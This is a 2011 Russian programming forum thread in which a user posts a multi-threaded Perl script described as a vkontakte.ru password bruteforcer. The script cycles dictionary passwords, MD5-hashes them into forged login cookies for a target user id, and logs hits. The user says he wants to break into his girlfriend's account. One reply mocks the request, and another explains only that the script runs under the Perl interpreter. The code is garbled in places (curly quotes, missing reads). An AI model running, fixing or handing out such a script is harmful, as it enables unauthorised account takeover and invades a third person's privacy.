Компьютерный форум
Правила
Вернуться   Компьютерный форум > Форум программистов > Веб-программирование > Perl
Перезагрузить страницу Куда припаять код который у меня есть
Ответ
 
Опции темы Опции просмотра
  (#1 (permalink)) Старый
imported_Aydar imported_Aydar вне форума
Новичок
 
Сообщений: 7
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 15.03.2011
По умолчанию Куда припаять код который у меня есть - 23.10.2011, 19:10

У меня есть программный код на языке Perl только вот у меня возникла проблема куда его припаять помогите пожалуйста жду ответа заранее спасибо =)
Ответить с цитированием
  (#2 (permalink)) Старый
Alexiski Alexiski вне форума
Любитель давать советы
 
Сообщений: 4,266
Сказал(а) спасибо: 27
Поблагодарили 54 раз(а) в 54 сообщениях
Регистрация: 16.10.2005
По умолчанию 24.10.2011, 01:46

Поясните,что за код.
Ответить с цитированием
  (#3 (permalink)) Старый
imported_Aydar imported_Aydar вне форума
Новичок
 
Сообщений: 7
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 15.03.2011
По умолчанию 24.10.2011, 23:43

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

######################################
# C!klodoL
# vkontakte.ru bruteforce with multi-threads
######################################
$dic = ‘passl.txt’; #словарь паролей
$id = 111111; #id цели
$mail = ‘mail%40mail.com’; #мыло, вместо @ вписать %40
$threads = 4; #количество потоков
######################################

open (pass, "<$dic”);

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while

(@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>’tcp’,PeerAddr=>’vkontakte.ru’,PeerPor t=>80);
print $sock "HEAD Добро пожаловать HTTP/1.0\r\n”.
"Host: vkontakte.ru\r\n”.
"Accept: */*\r\n”.
"Content-Type: application/x-www-form-urlencoded\r\n”.
"User-Agent: Mozillo\r\n”.
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n”.

"Connection: close\r\n\r\n”;
$answ = ;
close $sock;
print "$pass $answ”;
if ($answ =~ /302/){
open (good, ‘>>good.txt’);
print good "$id:$pass:$md5\n”;
print "$id:$pass:$md5\n”;
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (
){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Ответить с цитированием
  (#4 (permalink)) Старый
rotmaister rotmaister вне форума
программист-недосамоучка
 
Сообщений: 94
Сказал(а) спасибо: 0
Поблагодарили 3 раз(а) в 3 сообщениях
Регистрация: 23.03.2010
Адрес: город Сибай
По умолчанию 25.10.2011, 07:44

Чо, решил ломануть бэзпалева контакт?) а потом выпендриццо перед другом/подругой ? сомневаюсь что кто-то тебе посоветует что-либо)
+ к тому же код ужжасный)
Ответить с цитированием
  (#5 (permalink)) Старый
imported_Aydar imported_Aydar вне форума
Новичок
 
Сообщений: 7
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 15.03.2011
По умолчанию 26.10.2011, 12:10

Нет, я не собираюсь не перед кем выпендриваться... мне это не нужно, моим друзьям и подругам все это по шарам. Я хочу проверить свою gerl любовь на расстоянии это не очень просто.
Так ты сможешь мне обьяснить куда нужно залить код?
Ответить с цитированием
Ads.
  (#6 (permalink)) Старый
Alexiski Alexiski вне форума
Любитель давать советы
 
Сообщений: 4,266
Сказал(а) спасибо: 27
Поблагодарили 54 раз(а) в 54 сообщениях
Регистрация: 16.10.2005
По умолчанию 27.10.2011, 02:18

Это обычный программный код. Его нужно просто выполнять. Интерпретатором Перла. И будет он выполняться тупо и очень долго.
Ответить с цитированием
  (#7 (permalink)) Старый
imported_Aydar imported_Aydar вне форума
Новичок
 
Сообщений: 7
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Регистрация: 15.03.2011
По умолчанию 30.10.2011, 01:26

Спасибо дружище, получится или не получится всё равно спасибо.
Ответить с цитированием
Ads
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Выкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
У меня на телеке есть usb порты хочу спросить? user2000 Любые вопросы от новичков 5 23.03.2012 05:37
[срочно] Куда припаять провод от кнопки включения на ноутбуке? Lodri Любые вопросы от новичков 1 14.03.2012 22:41
Вопрос который меня убивает!!! dr.serj Любые вопросы от новичков 17 30.11.2011 05:35
Как правильно припаять провода misterloko Звук и акустические системы 2 07.02.2009 08:37
у меня есть столбец с датами определенных событий neutron Visual Basic 2 04.10.2008 23:08
Есть ли способ программно получить список стран, аналогичный тому который есть в Cont EvgenySh Visual C++ 2 05.03.2008 14:56
Есть обычный флойд который находит минимальные пути между всеми парами узлов в графе Shakra Алгоритмы 1 07.06.2007 18:01
Есть ли какой нибудь компонент типа TQuery для BDE который выполнял бы скрипт Garik888 Delphi 1 08.08.2006 12:43
Есть страница на которой лежит файл, который нужно загрузить как это реализовать ACTION_MAN Delphi 1 30.04.2005 16:51
Есть такой код, который создаёт шрифт и функция, которая выводит надпись Merl1n Visual C++ 1 06.01.2005 16:00
Есть ли Си-компилятор под Windows, который компилит программы под Unix perlmaster С/С++ 1 01.06.2004 07:33
Есть ли BGI, который поддерживает 800x600x256 gray С/С++ 8 07.08.2003 11:52



Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
Нardforum.ru - компьютерный форум и программирование, форум программистов